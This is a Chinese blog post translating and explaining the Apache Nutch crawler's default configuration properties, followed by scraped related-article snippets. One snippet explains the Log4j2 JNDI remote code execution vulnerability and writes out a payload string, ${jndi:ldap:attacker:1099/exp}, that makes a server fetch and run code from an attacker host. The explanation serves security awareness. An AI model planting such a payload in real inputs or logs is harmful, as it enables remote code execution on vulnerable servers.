zolomon

四,nutch 1.0 网站与爬虫的属性配置文件研究

本文为solomon@javaeye原创,如有转载,注明出处(作者solomon与链接 http://zolomon.iteye.com).
本专题使用中文分词为ikanalyzer,感谢其作者为java中文事业做出的巨大贡献.
我的个人资料 http://www.google.com/profiles/solomon.royarr

好不容易有空闲一天的时间写点东西,
可是发现这离开已久(其实只有几天)的办公环境已经没有所需足够的资料.
这边的网速连下载一个nutch也会影响到同事工作,
所以先拿一个网上找到的过去的nutch版本的配置文件讲解一下,
回头再修改成对应nutch 1.0的版本.
先跟读者说声抱歉了.
现在的版本来自 http://svn.apache.org/repos/asf/lucene/nutch/branches/branch-0.7/conf/nutch-default.xml

声明:
此篇
1)以翻译为主(主要是nutch-default.xml),
2)外加笔者个人使用nutch的经验,
3)外加官方nutch wiki上的FAQ中 http://wiki.apache.org/nutch/FAQ的内容,
4)结合过去网友的nutch配置文件讲解,
主要由以上4部分构成.

此文档中带有和这种注释为笔者提供的非翻译额外讲解.前者为在一段属性翻译之前提供的说明,后者为在一段属性翻译之后提供的解释.这两种注释不一定成对出现.

<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="nutch-conf.xsl"?>






<nutch-conf>




<property>
<name>http.agent.name</name>
<value>NutchCVS</value>
<description>我们的 HTTP 'User-Agent' 请求头.</description>
</property>


<property>
<name>http.robots.agents</name>
<value>NutchCVS,Nutch,*</value>
<description>我们要寻找 robots.txt 文件的目标 agent 字符串,可多个,
以逗号分隔, 按优先度降序排列.</description>
</property>


<property>
<name>http.robots.403.allow</name>
<value>true</value>
<description>在/robots.txt不存在时,有些服务器返回 HTTP status 403 (Forbidden). 这一般也许意味着我们仍然对该网站进行抓取. 如果此属性设为false, 我们会认为该网站不允许抓取而不去抓它.</description>
</property>

<property>
<name>http.agent.description</name>
<value>Nutch</value>
<description>同样用在User-Agent头中. 对bot- 更深入的解释. 它(这个value中的字符串)将出现在agent.name后的括号中.
</description>
</property>

<property>
<name>http.agent.url</name>
<value>http://lucene.apache.org/nutch/bot.html</value>
<description>同样用在User-Agent中. 它(指这个value中的字符串)将出现在agent.name后的字符串中, 只是个用于宣传等的url地址.
</description>
</property>

<property>
<name>http.agent.email</name>
<value>nutch-agent@lucene.apache.org</value>
<description>在 HTTP 'From' 请求头和 User-Agent 头中, 用于宣传的电子邮件地址.</description>
</property>

<property>
<name>http.agent.version</name>
<value>0.7.2</value>
<description>在 User-Agent 头中用于宣传的版本号.</description>
</property>

<property>
<name>http.timeout</name>
<value>10000</value>
<description>默认网络超时, 单位毫秒.</description>
</property>

<property>
<name>http.max.delays</name>
<value>3</value>
<description>抓取一个页面的推迟次数. 每次发现一个host很忙的时候, nutch会推迟fetcher.server.delay这么久. 在http.max.delays次推迟发生过之后, 这次抓取就会放弃该页.</description>
</property>

<property>
<name>http.content.limit</name>
<value>65536</value>
<description>下载内容最大限制, 单位bytes.
如果value中的值非零(>=0), 那么大于这个值的部分将被截断; 否则不截.
</description>
</property>


<property>
<name>http.proxy.host</name>
<value></value>
<description>代理主机名. 如果为空, 则不使用代理.</description>
</property>

<property>
<name>http.proxy.port</name>
<value></value>
<description>代理主机端口.</description>
</property>

<property>
<name>http.verbose</name>
<value>false</value>
<description>If true, HTTP will log more verbosely.</description>
</property>


<property>
<name>http.redirect.max</name>
<value>3</value>
<description>抓取时候最大redirect数, 如果网页有超过这个数的redirect, fetcher就会尝试下一个网页(放弃这个网页).</description>
</property>



<property>
<name>file.content.limit</name>
<value>65536</value>
<description>下载内容的长度, 单位是bytes.
如果值不为零, 大于这个值的内容会被截掉; 否则 (零或负数), 不会有内容被截掉.
</description>
</property>

<property>
<name>file.content.ignored</name>
<value>true</value>
<description>如果为true, 在fetch过程中没有文件内容会被存储.
一般情况我们都是希望这样做的, 因为 file:// 协议的 URL 通常意味着它在本地, 我们可以直接对它执行抓取与建立索引工作. 否则(如果不为真), 文件内容将被存储.
!! NO IMPLEMENTED YET !! (!! 还没实现 !!)
</description>
</property>



<property>
<name>ftp.username</name>
<value>anonymous</value>
<description>ftp登陆用户名.</description>
</property>

<property>
<name>ftp.password</name>
<value>anonymous@example.com</value>
<description>ftp登陆密码.</description>
</property>

<property>
<name>ftp.content.limit</name>
<value>65536</value>
<description>文件内容长度上限, 单位是bytes.
如果这个值大于零, 大于这个值的内容会被截掉; 否则 (零或负数), 什么都不会截. 注意: 传统的
ftp RFCs从未提供部分传输而且, 实际上, 有些ftp服务器无法处理客户端强行关闭
我们努力尝试去处理了这种情况, 让它可以运行流畅.
</description>
</property>

<property>
<name>ftp.timeout</name>
<value>60000</value>
<description>默认ftp客户端socket超时, 单位是毫秒. 也请查阅下边的ftp.keep.connection属性.</description>
</property>

<property>
<name>ftp.server.timeout</name>
<value>100000</value>
<description>一个对ftp服务器idle time的估计, 单位是毫秒. 对于多数fgp服务器来讲120000毫秒是很典型的.
这个设置最好保守一点. 与ftp.timeout属性一起, 它们用来决定我们是否需要删除 (干掉) 当前 ftp.client 实例并强制重新启动另一个 ftp.client 实例. 这是需要的,因为一个fetcher线程也许不会在ftp client远程超时断开前按时进行下一个request
(可能会无所事事). 只有在ftp.keep.connection(参见下边)是真的时候使用.
</description>
</property>

<property>
<name>ftp.keep.connection</name>
<value>false</value>
<description>是否保持ftp连接.在同一个主机上一遍又一遍反复抓取时候很有用. 如果设为真, 它会避开连接, 登陆和目录列表为子序列url安装(原文用的setup,此处意思不同于install)解析器. 如果设为真, 那么, 你必须保证(应该):
(1) ftp.timeout必须比ftp.server.timeout小
(2) ftp.timeout必须比(fetcher.threads.fetch * fetcher.server.delay)大
否则在线程日志中会出现大量"delete client because idled too long"消息.</description>
</property>

<property>
<name>ftp.follow.talk</name>
<value>false</value>
<description>是否记录我们的客户端与远程服务器之间的dialogue. 调试(debug)时候很有用.</description>
</property>



<property>
<name>db.default.fetch.interval</name>
<value>30</value>
<description>默认重抓一个网页的(间隔)天数.
</description>
</property>

<property>
<name>db.ignore.internal.links</name>
<value>true</value>
<description>如果是真, 在给一个新网页增加链接时, 从同一个主机的链接会被忽略. 这是一个非常有效的方法用来限制链接数据库的大小, 只保持质量最高的一个链接.
</description>
</property>


<property>
<name>db.score.injected</name>
<value>1.0</value>
<description>注入新页面所需分数injector.
</description>
</property>


<property>
<name>db.score.link.external</name>
<value>1.0</value>
<description>添加新页面时, 来自新主机页面与原因热面的分数因子 added due to a link from
another host relative to the referencing page's score.
</description>
</property>

<property>
<name>db.score.link.internal</name>
<value>1.0</value>
<description>The score factor for pages added due to a link from the
same host, relative to the referencing page's score.
</description>
</property>

<property>
<name>db.max.outlinks.per.page</name>
<value>100</value>
<description>我们会解析的从一个一页面出发的外部链接的最大数量.</description>
</property>

<property>
<name>db.max.anchor.length</name>
<value>100</value>
<description>链接最大长度.</description>
</property>

<property>
<name>db.fetch.retry.max</name>
<value>3</value>
<description>抓取时最大重试次数.</description>
</property>



<property>
<name>fetchlist.score.by.link.count</name>
<value>true</value>
<description>If true, set page scores on fetchlist entries based on
log(number of anchors), instead of using original page scores. This
results in prioritization of pages with many incoming links.
</description>
</property>



<property>
<name>fetcher.server.delay</name>
<value>5.0</value>
<description>The number of seconds the fetcher will delay between
   successive requests to the same server.</description>
</property>

<property>
<name>fetcher.threads.fetch</name>
<value>10</value>
<description>同时使用的抓取线程数.
    This is also determines the maximum number of requests that are
    made at once (each FetcherThread handles one connection).</description>
</property>

<property>
<name>fetcher.threads.per.host</name>
<value>1</value>
<description>每主机允许的同时抓取最大线程数.</description>
</property>

<property>
<name>fetcher.verbose</name>
<value>false</value>
<description>如果为真, fetcher会做更多的log.</description>
</property>


<property>
<name>parser.threads.parse</name>
<value>10</value>
<description>ParseSegment同时应该使用的解析线程数.</description>
</property>



<property>
<name>io.sort.factor</name>
<value>100</value>
<description>The number of streams to merge at once while sorting
files. This determines the number of open file handles.</description>
</property>

<property>
<name>io.sort.mb</name>
<value>100</value>
<description>The total amount of buffer memory to use while sorting
files, in megabytes. By default, gives each merge stream 1MB, which
should minimize seeks.</description>
</property>

<property>
<name>io.file.buffer.size</name>
<value>131072</value>
<description>The size of buffer for use in sequence files.
The size of this buffer should probably be a multiple of hardware
page size (4096 on Intel x86), and it determines how much data is
buffered during read and write operations.</description>
</property>



<property>
<name>fs.default.name</name>
<value>local</value>
<description>The name of the default file system. Either the
literal string "local" or a host:port for NDFS.</description>
</property>

<property>
<name>ndfs.name.dir</name>
<value>/tmp/nutch/ndfs/name</value>
<description>Determines where on the local filesystem the NDFS name node
      should store the name table.</description>
</property>

<property>
<name>ndfs.data.dir</name>
<value>/tmp/nutch/ndfs/data</value>
<description>Determines where on the local filesystem an NDFS data node
      should store its blocks.</description>
</property>



<property>
<name>mapred.job.tracker</name>
<value>localhost:8010</value>
<description>The host and port that the MapReduce job tracker runs at.
</description>
</property>

<property>
<name>mapred.local.dir</name>
<value>/tmp/nutch/mapred/local</value>
<description>The local directory where MapReduce stores temprorary files
      related to tasks and jobs.
</description>
</property>



<property>
<name>indexer.score.power</name>
<value>0.5</value>
<description>Determines the power of link analyis scores. Each
pages's boost is set to <i>score<sup>scorePower</sup></i> where
<i>score</i> is its link analysis score and <i>scorePower</i> is the
value of this parameter. This is compiled into indexes, so, when
this is changed, pages must be re-indexed for it to take
effect.</description>
</property>

<property>
<name>indexer.boost.by.link.count</name>
<value>true</value>
<description>When true scores for a page are multipled by the log of
the number of incoming links to the page.</description>
</property>

<property>
<name>indexer.max.title.length</name>
<value>100</value>
<description>The maximum number of characters of a title that are indexed.
</description>
</property>

<property>
<name>indexer.max.tokens</name>
<value>10000</value>
<description>
The maximum number of tokens that will be indexed for a single field
in a document. This limits the amount of memory required for
indexing, so that collections with very large files will not crash
the indexing process by running out of memory.

Note that this effectively truncates large documents, excluding
from the index tokens that occur further in the document. If you
know your source documents are large, be sure to set this value
high enough to accomodate the expected size. If you set it to
Integer.MAX_VALUE, then the only limit is your memory, but you
should anticipate an OutOfMemoryError.
</description>
</property>

<property>
<name>indexer.mergeFactor</name>
<value>50</value>
<description>The factor that determines the frequency of Lucene segment
merges. This must not be less than 2, higher values increase indexing
speed but lead to increased RAM usage, and increase the number of
open file handles (which may lead to "Too many open files" errors).
NOTE: the "segments" here have nothing to do with Nutch segments, they
are a low-level data unit used by Lucene.
</description>
</property>

<property>
<name>indexer.minMergeDocs</name>
<value>50</value>
<description>This number determines the minimum number of Lucene
Documents buffered in memory between Lucene segment merges. Larger
values increase indexing speed and increase RAM usage.
</description>
</property>

<property>
<name>indexer.maxMergeDocs</name>
<value>2147483647</value>
<description>This number determines the maximum number of Lucene
Documents to be merged into a new Lucene segment. Larger values
increase indexing speed and reduce the number of Lucene segments,
which reduces the number of open file handles; however, this also
increases RAM usage during indexing.
</description>
</property>

<property>
<name>indexer.termIndexInterval</name>
<value>128</value>
<description>Determines the fraction of terms which Lucene keeps in
RAM when searching, to facilitate random-access. Smaller values use
more memory but make searches somewhat faster. Larger values use
less memory but make searches somewhat slower.
</description>
</property>



<property>
<name>analysis.common.terms.file</name>
<value>common-terms.utf8</value>
<description>The name of a file containing a list of common terms
that should be indexed in n-grams.</description>
</property>



<property>
<name>searcher.dir</name>
<value>.</value>
<description>
Path to root of index directories. This directory is searched (in
order) for either the file search-servers.txt, containing a list of
distributed search servers, or the directory "index" containing
merged indexes, or the directory "segments" containing segment
indexes.
</description>
</property>

<property>
<name>searcher.filter.cache.size</name>
<value>16</value>
<description>
Maximum number of filters to cache. Filters can accelerate certain
field-based queries, like language, document format, etc. Each
filter requires one bit of RAM per page. So, with a 10 million page
index, a cache size of 16 consumes two bytes per page, or 20MB.
</description>
</property>

<property>
<name>searcher.filter.cache.threshold</name>
<value>0.05</value>
<description>
Filters are cached when their term is matched by more than this
fraction of pages. For example, with a threshold of 0.05, and 10
million pages, the term must match more than 1/20, or 50,000 pages.
So, if out of 10 million pages, 50% of pages are in English, and 2%
are in Finnish, then, with a threshold of 0.05, searches for
"lang:en" will use a cached filter, while searches for "lang:fi"
will score all 20,000 finnish documents.
</description>
</property>

<property>
<name>searcher.hostgrouping.rawhits.factor</name>
<value>2.0</value>
<description>
A factor that is used to determine the number of raw hits
initially fetched, before host grouping is done.
</description>
</property>

<property>
<name>searcher.summary.context</name>
<value>5</value>
<description>
The number of context terms to display preceding and following
matching terms in a hit summary.
</description>
</property>

<property>
<name>searcher.summary.length</name>
<value>20</value>
<description>
The total number of terms to display in a hit summary.
</description>
</property>



<property>
<name>urlnormalizer.class</name>
<value>org.apache.nutch.net.BasicUrlNormalizer</value>
<description>Name of the class used to normalize URLs.</description>
</property>

<property>
<name>urlnormalizer.regex.file</name>
<value>regex-normalize.xml</value>
<description>Name of the config file used by the RegexUrlNormalizer class.</description></property>



<property>
<name>mime.types.file</name>
<value>mime-types.xml</value>
<description>Name of file in CLASSPATH containing filename extension and
magic sequence to mime types mapping information</description>
</property>

<property>
<name>mime.type.magic</name>
<value>true</value>
<description>Defines if the mime content type detector uses magic resolution.
</description>
</property>



<property>
<name>ipc.client.timeout</name>
<value>10000</value>
<description>Defines the timeout for IPC calls in milliseconds. </description>
</property>



<property>
<name>plugin.folders</name>
<value>plugins</value>
<description>Directories where nutch plugins are located. Each
element may be a relative or absolute path. If absolute, it is used
as is. If relative, it is searched for on the classpath.</description>
</property>

<property>
<name>plugin.includes</name>
<value>nutch-extensionpoints|protocol-http|urlfilter-regex|parse-(text|html)|index-basic|query-(basic|site|url)</value>
<description>Regular expression naming plugin directory names to
include. Any plugin not matching this expression is excluded.
In any case you need at least include the nutch-extensionpoints plugin. By
default Nutch includes crawling just HTML and plain text via HTTP,
and basic indexing and search plugins.
</description>
</property>

<property>
<name>plugin.excludes</name>
<value></value>
<description>Regular expression naming plugin directory names to exclude.
</description>
</property>

<property>
<name>parser.character.encoding.default</name>
<value>windows-1252</value>
<description>The character encoding to fall back to when no other information
is available</description>
</property>

<property>
<name>parser.html.impl</name>
<value>neko</value>
<description>HTML Parser implementation. Currently the following keywords
are recognized: "neko" uses NekoHTML, "tagsoup" uses TagSoup.
</description>
</property>



<property>
<name>urlfilter.regex.file</name>
<value>regex-urlfilter.txt</value>
<description>Name of file on CLASSPATH containing regular expressions
used by urlfilter-regex (RegexURLFilter) plugin.</description>
</property>

<property>
<name>urlfilter.prefix.file</name>
<value>prefix-urlfilter.txt</value>
<description>Name of file on CLASSPATH containing url prefixes
used by urlfilter-prefix (PrefixURLFilter) plugin.</description>
</property>

<property>
<name>urlfilter.order</name>
<value></value>
<description>The order by which url filters are applied.
If empty, all available url filters (as dictated by properties
plugin-includes and plugin-excludes above) are loaded and applied in system
defined order. If not empty, only named filters are loaded and applied
in given order. For example, if this property has value:
org.apache.nutch.net.RegexURLFilter org.apache.nutch.net.PrefixURLFilter
then RegexURLFilter is applied first, and PrefixURLFilter second.
Since all filters are AND'ed, filter ordering does not have impact
on end result, but it may have performance implication, depending
on relative expensiveness of filters.
</description>
</property>



<property>
<name>extension.clustering.hits-to-cluster</name>
<value>100</value>
<description>Number of snippets retrieved for the clustering extension
if clustering extension is available and user requested results
to be clustered.</description>
</property>

<property>
<name>extension.clustering.extension-name</name>
<value></value>
<description>Use the specified online clustering extension. If empty,
the first available extension will be used. The "name" here refers to an 'id'
attribute of the 'implementation' element in the plugin descriptor XML
file.</description>
</property>



<property>
<name>extension.ontology.extension-name</name>
<value></value>
<description>Use the specified online ontology extension. If empty,
the first available extension will be used. The "name" here refers to an 'id'
attribute of the 'implementation' element in the plugin descriptor XML
file.</description>
</property>

<property>
<name>extension.ontology.urls</name>
<value>
</value>
<description>Urls of owl files, separated by spaces, such as
http://www.example.com/ontology/time.owl
http://www.example.com/ontology/space.owl
http://www.example.com/ontology/wine.owl
Or
file:/ontology/time.owl
file:/ontology/space.owl
file:/ontology/wine.owl
You have to make sure each url is valid.
By default, there is no owl file, so query refinement based on ontology
is silently ignored.
</description>
</property>



<property>
<name>query.url.boost</name>
<value>4.0</value>
<description> Used as a boost for url field in Lucene query.
</description>
</property>

<property>
<name>query.anchor.boost</name>
<value>2.0</value>
<description> Used as a boost for anchor field in Lucene query.
</description>
</property>

<property>
<name>query.title.boost</name>
<value>1.5</value>
<description> Used as a boost for title field in Lucene query.
</description>
</property>

<property>
<name>query.host.boost</name>
<value>2.0</value>
<description> Used as a boost for host field in Lucene query.
</description>
</property>

<property>
<name>query.phrase.boost</name>
<value>1.0</value>
<description> Used as a boost for phrase in Lucene query.
Multiplied by boost for field phrase is matched in.
</description>
</property>



<property>
<name>lang.ngram.min.length</name>
<value>1</value>
<description> The minimum size of ngrams to uses to identify
language (must be between 1 and lang.ngram.max.length).
The larger is the range between lang.ngram.min.length and
lang.ngram.max.length, the better is the identification, but
the slowest it is.
</description>
</property>

<property>
<name>lang.ngram.max.length</name>
<value>4</value>
<description> The maximum size of ngrams to uses to identify
language (must be between lang.ngram.min.length and 4).
The larger is the range between lang.ngram.min.length and
lang.ngram.max.length, the better is the identification, but
the slowest it is.
</description>
</property>

<property>
<name>lang.analyze.max.length</name>
<value>2048</value>
<description> The maximum bytes of data to uses to indentify
the language (0 means full content analysis).
The larger is this value, the better is the analysis, but the
slowest it is.
</description>
</property>

</nutch-conf>

你可能感兴趣的:(apache,mapreduce,xml,Lucene,XSL)

Java解析XML文件解决方案 JKIT沐枫 java servlet 前端
1.DOM解析器特点：将整个XML文档加载到内存中形成树状结构，适合小型XML文件javaimportjavax.xml.parsers.DocumentBuilder;importjavax.xml.parsers.DocumentBuilderFactory;importorg.w3c.dom.Document;importorg.w3c.dom.NodeList;importorg.w3c.
Android 科大讯飞语音识别(详细步骤+源码) 2401_85730195 android 语音识别人工智能
}}implementationfiles(‘libs/Msc.jar’)改完记得Sync一下然后修改布局activity_main.xml接下来就是MainActivity了③编码一、声明变量和初始化privatestaticfinalStringTAG=“MainActivity”;privateSpeechRecognizermIat;//语音听写对象privateRecognizerDia
Java中的Apache POI库：Excel操作从未如此简单墨瑾轩一起学学Java【一】java apache excel
关注墨瑾轩，带你探索编程的奥秘！超萌技术攻略，轻松晋级编程高手技术宝库已备好，就等你来挖掘订阅墨瑾轩，智趣学习不孤单即刻启航，编程之旅更有趣❓引言嗨，小伙伴们！今天我们要聊的是一个非常实用的Java库——ApachePOI。如果你经常需要处理Excel文件，那么这个库绝对是你的好帮手。ApachePOI可以让你轻松地读取、写入、甚至编辑Excel文件，而且这一切都不需要安装MicrosoftOff
Excel生成Sql工具.java JokerPan12 java excel sql
今天分享一个使用excel表格一键生成建表语句sql工具1.前置所需依赖cn.hutoolhutool-all5.1.0org.apache.poipoi-ooxml4.1.2org.projectlomboklombokprovided2.新建Excel文件并设计表结构ps：字段属性值0为非空1为主键3.新建工具类packagecom.ruoyi.generator.util;importcn.
SpringBoot HttpURLConnection、Apache HttpClient、OkHttp和Spring RestTemplate的基本使用方法又夏天 spring spring boot apache
HttpURLConnection是Java标准库中提供的用于发送HTTP请求和接收HTTP响应的类。它可以用于创建HTTP连接、设置请求方法、请求头、请求体等，并可以获取响应状态码、响应头、响应体等信息。以下是HttpURLConnection的基本使用方法：创建URL对象，指定要访问的URL地址。调用URL对象的openConnection方法，返回HttpURLConnection对象。设置
python爬虫之爬取bing网页图片纯小白菜鸟 python python 爬虫
frombs4importBeautifulSoup：导入BeautifulSoup库，用于解析HTML和XML文档。headers={...}：定义了一个请求头，它包含了一个User-Agent字符串，这个字符串告诉网站我们的请求是从哪种浏览器发出的。这有助于模拟真实的浏览器行为，有些网站可能会拒绝没有User-Agent的请求。sousuo=input('主人要看什么图片~：')：从用户那里获
MyBatis 逆向工程（MBG）详解 verify.Mar mybatis
1.逆向工程的核心功能为什么要使用MyBatis逆向工程？自动生成代码：自动创建Model、Mapper、Mapper.xml文件，减少重复劳动。减少出错概率：手写SQL可能有语法错误，MBG生成的SQL语句结构规范，减少错误。节省开发时间：大大减少数据库表结构变更后代码修改的成本。可自定义生成规则：可以选择是否生成Example类，是否生成注解SQL还是XML形式的SQL语句等。2.逆向工程环境
java框架篇--MyBatis 使用了哪些设计模式？在源码中是如何体现的？爱分享的淘金达人 Java源码剖析(30讲)mybatis 设计模式源码分析
MyBatis的前身是IBatis，IBatis是由Internet和Abatis组合而成，其目的是想当做互联网的篱笆墙，围绕着数据库提供持久化服务的一个框架，2010年正式改名为MyBatis。它是一款优秀的持久层框架，支持自定义SQL、存储过程及高级映射。MyBatis免除了几乎所有的JDBC代码以及设置参数和获取结果集的工作，还可以通过简单的XML或注解来配置和映射原始类型、接口和JavaP
axios面试题青柠t 前端 javascript
axios是什么Axios是一个基于promise的HTTP库，可以用在浏览器和node.js中。前端最流行的ajax请求库react/vue官方都推荐使用axios发ajax请求axios特点基于promise的异步ajax请求库，支持promise所有的API浏览器端/node端都可以使用，浏览器中创建XMLHttpRequests，在node.js中发送http请求支持请求／响应拦截器支持请
axios设置请求头 web18224617243 面试学习路线阿里巴巴 android 前端后端
背景：请求后端数据时，接口返回json为空。与后端沟通发现，请求头中缺少‘X-Requested-With’:‘XMLHttpRequest’解决：1，vue+vant项目中service.interceptors.request.use(config=>{config.headers={‘X-Requested-With’:‘XMLHttpRequest’}if(store.getters.to
python网络爬虫-二度进阶篇·Xpath与lxml Tttian622 python爬虫 html xml python
1.XPath语法1.选取节点路径表达式描述/div/a从根节点开始选取div节点下的a节点/div/a[2]/img从根节点开始选取div节点下的第二给a节点下的img节点//div[@class='header-wrapper'选取所有属性class的值为header-warpper的div节点//*选取文档中所有元素//@*选取文档中所有带属性的元素2.谓语查找特定的节点或者包含某个指定值的
开发EDA工具常用的三方开源 tiger119 fpga开发开源软件
EDA软件是制造芯片重要工具，是现在举国的大难题。这个工具难在哪里，几句话说不清，但它确实也有一些非常通用的功能，这些功能依赖一些成熟的轮子，这些轮子，就是三方的开源项目，下面列举一些常用的开源项目，供大家参考。首先，我们假定EDA工具使用C++开发技术栈。按用途把用到的开源项目分为以下几类。通用C++框架：boost数据格式：jsoncpp，protobuf，pugixml，spdlog，tab
Kafka(Go)教程(三)---Kafka 相关概念介绍探索云原生 Kafka kafka
来自：指月https://www.lixueduan.com原文：https://www.lixueduan.com/post/kafka/03-kafka-introduction/本文为Kafka入门教程,主要包括相关概念介绍如：消息引擎、Kafka相关术语、角色定位及其版本选择等等。1.消息引擎Kafka系列相关代码见GithubKafka是什么呢？用一句话概括一下：ApacheKafka是
Kafka、RocketMQ、Pulsar对比小诸葛的博客 kafka rocketmq 分布式
ApachePulsar、ApacheKafka和ApacheRocketMQ都是流行的分布式消息系统，它们在架构设计、功能特性和适用场景上各有不同。以下是Pulsar相较于Kafka和RocketMQ的主要区别：1.架构设计Pulsar：分层架构：Pulsar采用计算与存储分离的设计，Broker（计算层）负责消息的路由和处理，ApacheBookKeeper（存储层）负责持久化存储。这种分离使
Kafka系列教程 - Kafka 运维 -8 长河 Kafka kafka 运维分布式
1.Kafka单点部署1.1.下载解压进入官方下载地址：http://kafka.apache.org/downloads，选择合适版本。(opensnewwindow)解压到本地：$tar-xzfkafka_2.13-3.9.0.tgz$cdkafka_2.13-3.9.0现在您已经在您的机器上下载了最新版本的Kafka。1.2.启动服务器以KRaft启动，不要需要zookeeper生成集群UU
Maven安装与配置完整指南遥不可及~~斌 maven java
Maven安装与配置完整指南1.前言ApacheMaven是一个强大的项目管理和构建工具，广泛应用于Java项目开发。它通过POM（ProjectObjectModel）文件管理项目依赖，并提供了标准化的构建流程。本文详细介绍Maven的下载、安装、环境配置、镜像加速、IDE集成以及常见问题解决，帮助开发者快速搭建Maven环境。2.准备工作2.1系统要求项目要求JDK版本JDK1.7+（推荐JD
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228) 白8080 log4j
漏洞描述：当用户输入信息时，应用程序中的log4j2组件会将信息记录到日志中假如日志中包含有语句${jndi:ldap:attacker:1099/exp}，log4j就会去解析该信息，通过jndi的lookup()方法去解析该url：ldap:attacker:1099/exp受害主机访问伪造的ldap服务，访问恶意java.class类，执行恶意代码。如果ldap没有解析成功会自动访问http
springboot全局异常与日志寸心万绪 spring boot java 后端
日志在resources文件夹中创建logback-spring.xml文件这个会在你项目的平级目录创建一个Logs文件夹，根据时间进行区分，并包含错误日志和控制台打印日志[%ip]%d{yyyy-MM-ddHH:mm:ss.SSS}[%thread]%-5level%logger{36}-%msg%n-->[host：%ip]%d{yyyy-MM-ddHH:mm:ss.SSS}[%thread]
Qt中的数据解析--XML与JSON处理全攻略努力搬砖的咸鱼 QT中级开发技巧 xml json qt 开发语言
概述XML（可扩展标记语言）和JSON（JavaScript对象表示法）是两种最常用的数据格式，分别适用于不同的场景。Qt框架为这两种格式提供了强大的解析工具，本文将详细介绍如何利用Qt库来高效地处理XML和JSON数据。XML解析Qt为XML解析提供了多种工具，开发者可以根据需求选择适合的方式。常用的类包括QXmlStreamReader和QDomDocument，它们分别适用于流式解析和树形结
Apache Doris 2.1.9 版本正式发布
亲爱的社区小伙伴们，ApacheDoris2.1.9版本已正式发布。2.1.9版本对湖仓一体、倒排索引、半结构化数据类型、查询优化器、执行引擎、存储管理进行了若干改进优化。欢迎大家下载使用。官网下载：https://doris.apache.org/downloadGitHub下载：https://github.com/apache/doris/releases行为变更AuditLog中的SQLH
Github 2025-03-30 php开源项目日报 Top10 老孙正经胡说 github php 开源 Github趋势分析开源项目 Python Golang
根据GithubTrendings的统计，今日(2025-03-30统计)共有10个项目上榜。根据开发语言中项目的数量，汇总情况如下：开发语言项目数量PHP项目10TypeScript项目1Coolify:开源自助云平台创建周期：1112天开发语言：PHP,Blade协议类型：ApacheLicense2.0Star数量：10527个Fork数量：567次关注人数：10527人贡献人数：80人Op
#学习笔记#使用dom4j读取xml文件得到document对象一段对白 xml java dom javascript
使用dom4j读取xml文件得到document对象先新建一个xml文件时间简史霍金75Java从入门到入土<某某某<9.9//books.javapackagelianxi01;importjava.math.BigDecimal;publicclassbooks{privateStringsn;//防止类中的数据成员，在类的定义之外被修改privateStringname;priv
Java集合List快速实现重复判断的10种方法深度解析 .猫的树 Java java list 开发语言集合
文章目录引言：为什么需要关注List重复判断？一、基础实现方法1.1暴力双循环法1.2HashSet法二、进阶实现方案2.1StreamAPI实现2.2TreeSet排序法三、高性能优化方案3.1并行流处理3.2BitSet位图法（仅限整数）四、第三方库实现4.1Guava工具类4.2ApacheCommons五、性能测试对比5.1测试环境配置5.2百万级数据测试结果六、最佳实践指南6.1选择依据
XML（超详细笔记DTD XSD DOM SAX XML解析） PJP__00 xml 笔记 java mybatis spring boot
目录简介什么是xml?xml的作用细节DTD1.简介2.分类2.1内部DTD细节2.2外部DTD2.3公共DTD（使用最多）3.总结XSD1.简介2.定义XSD3.引用XSDXML解析1.简介2.DOM解析2.1DOM方式2.2DOM优缺点2.3主要的三种节点2.4DOM生成XMl（不常用）3.SAX解析3.1SAX方式3.2SAX方式优缺点3.3SAX生成XML通过DOM/SAX解析XMl到实体
MongoDB mapReduce使用 guoqianqian5812 Mongodb mapreduce mongodb
转载自：http://blog.csdn.net/qqiabc521/article/details/6330783MongoDB的MapReduce相当于Mysql中的group使用MapReduce要实现两个函数MapFunction和ReduceFunction在调用mapReduce时需要用到这两个函数db.things.mapReduce(MapFunction,ReduceFuncti
使用 MapReduce 进行高效数据清洗：从理论到实践麻芝汤圆 spark大数据分析 mapreduce 大数据网络服务器数据库 linux windows
在大数据时代，数据清洗是数据分析和处理流程中的关键步骤。无论是处理结构化数据还是非结构化数据，数据清洗的目标都是确保数据的准确性、完整性和一致性。然而，随着数据量的爆炸式增长，传统的单机数据清洗方法已经无法满足需求。MapReduce作为一种分布式计算框架，能够高效地处理海量数据，为数据清洗提供了一种强大的解决方案。本文将深入探讨如何使用MapReduce进行数据清洗，从理论到实践，帮助你掌握这一
SpringKafka消息发布：KafkaTemplate与事务支持程序媛学姐 Spring 全家桶 Java linq c#java 开发语言
文章目录引言一、KafkaTemplate基础二、消息序列化三、事务支持机制四、错误处理与重试五、性能优化总结引言在现代分布式系统架构中，ApacheKafka作为高吞吐量的消息系统，被广泛应用于事件驱动应用开发。SpringKafka为Java开发者提供了与Kafka交互的简便方式，特别是通过KafkaTemplate抽象，极大地简化了消息发布过程。本文将探讨SpringKafka的消息发布机制
Mybatis 如何自定义缓存？冰糖心书房 Mybatis 源码系列 mybatis 缓存 java
MyBatis通过实现org.apache.ibatis.cache.Cache接口来自定义二级缓存，我们可以集成各种第三方缓存(如Redis,Ehcache,Memcached等）或实现自己特定的缓存逻辑。以下是自定义MyBatis缓存的步骤和要点：1.实现org.apache.ibatis.cache.Cache接口我们需要创建一个Java类来实现org.apache.ibatis.cache
sts4创建spring项目_STS创建SpringBoot项目 weixin_39995280 sts4创建spring项目
STS--SpringBoot项目一、创建父项目步骤：1.newSpring-Stater-Project(下一步直到完成)(如果出现错误:JSONException:AJSONObjecttextmustbeginwith'{'atcharacter0解决方案：http-->https)2.将pom.xml中的jar改为:pom(如果pom文件报错：mavenconfigurationprobl
Thymeleaf学习教程 geekmice Thymeleaf 后端 xml 个人开发
文章目录1.环境搭建2.基本配置3.创建模板4.渲染模板5.运行程序6.常用语法7.进阶学习8.参考文档Thymeleaf是一个现代化的服务器端Java模板引擎，适用于Web和独立环境。它能够处理HTML、XML、JavaScript、CSS甚至纯文本。Thymeleaf的主要目标是提供一种优雅且高度可维护的模板创建方式。为了实现这一目标，它以自然模板的概念为基础，将模板文件作为原型，这意味着它们
枚举的构造函数中抛出异常会怎样 bylijinnan java enum 单例
首先从使用enum实现单例说起。为什么要用enum来实现单例？这篇文章（ http://javarevisited.blogspot.sg/2012/07/why-enum-singleton-are-better-in-java.html）阐述了三个理由： 1.enum单例简单、容易，只需几行代码： public enum Singleton { INSTANCE;
CMake 教程 aigo C++
